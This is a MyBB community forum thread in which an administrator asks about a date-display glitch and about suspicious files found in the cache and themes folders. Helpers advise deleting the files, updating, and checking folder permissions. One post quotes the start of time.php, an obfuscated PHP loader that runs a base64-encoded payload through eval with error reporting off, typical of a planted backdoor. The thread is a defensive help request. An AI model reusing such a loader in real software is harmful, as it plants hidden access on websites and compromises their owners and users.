MyBB Community Forums

Full Version: User problem?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Hello, today a user register on the forum and when I went to see his profile I came across something strange

Date of Birth: Januaryriday, January 1st, 1988 (21 years old)

As you can see it docent say the date but instead it says Januaryriday

Please help me.
I also have one question in cache folder dose there supposed to be 2 files? time.php and date.php?

Here is some code of time.php
error_reporting(0);$s="e";$p="begbazzazbzcah";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcm
Reupload inc/global.lang.php

time.php and date.php are not supposed to be there so I recommend you delete those.
They may be hacking attempts. What version of MyBB are you running?
I remove this files there where 2 more files in the themes folder

report.php and include.php I also deleted time.php and date.php

I am running the latest version of MyBB which I updated yesterday do to the glitch with user registration date

Date of Birth: Januaryriday, January 1st, 1988 (21 years old) still there even after I reuploaded global.lang.php to inc/english/english

I terminated that user cuz the boards are designed for teens rather then 21 or like some one registerd 88
Could you list your contents of your entire cache folder and subfolders?
Is that language error only on that user then??
If I register new acc with same dd/mm/yyyy of birth it will still be the same... so its the problem for that time of birth as I can see

For other things I installed new version and removed all suspicious files that did not match default installation package files.
Is there any way I can protect my folders from files being added to them?
Well the only way you could create files there would be via ftp or through mybb itself. So just keep updated and it should be fine.

If you try reuploading all the language packs in inc/languages then it should fix the problem...
Okey, I took the pro cation of terminating strange accounts that where inactive and registered with 88, 21 years of age
Dose this play any roles in terms of security?

Configuration File ./inc/config.php Writable
Settings File ./inc/settings.php Writable
File Uploads Directory ./uploads Writable
Avatar Uploads Directory ./uploads/avatars Writable
Language Files ./inc/languages Writable
Backups Directory ./admin/backups Writable
Cache Directory ./cache Writable
Themes Directory ./cache/themes Writable
One more question what do I need to put into Cron Jobs to allow Table Check to run?